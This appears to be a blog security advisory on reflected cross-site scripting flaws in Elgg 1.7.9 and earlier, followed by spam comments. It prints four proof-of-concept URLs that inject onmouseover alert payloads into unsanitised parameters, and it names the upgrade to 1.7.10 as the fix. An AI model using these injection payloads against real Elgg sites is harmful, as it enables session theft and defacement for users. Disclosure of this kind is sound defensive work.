Cross Site Scripting Vulnerabilities in Elgg <= 1.7.9

New vulnerability has been discovered in Elgg an open-source application that helps to create social networking engine, delivering the building blocks that enable businesses, schools, universities and associations to create their own fully-featured social networks and applications.

Well-known Organizations with networks powered by Elgg include: Australian Government, British Government, Federal Canadian Government, MITRE, The World Bank, UNESCO, NASA, Stanford University, Johns Hopkins University and more (http://elgg.org/powering.php).

Vulnerability exist in several application parameters (page_owner, content,internalname, QUERY_STRING) that are not properly sanitized, which allows attacker to conduct Cross Site Scripting attack.

[php]http://localhost/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f

http://localhost/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true

http://localhost/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22

http://localhost/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22[/php]

To fix this vulnerability you need to upgrade Elgg to 1.7.10 or higher.

Share
You can leave a response, or trackback from your own site.
  • united gold direct

    Hey, I really enjoyed reading this post……it made my day    Yu have a really fun blog, I hope you post more stuff like this soon…thanks a lot 

  • buy levitra online

    I have inspired by reading your blog. You gave me much interesting stuff. Hope to see more posts. Thanks

  • http://www.e-zest.net/ Mike Bosch

    Really valuable article.

  • applecjj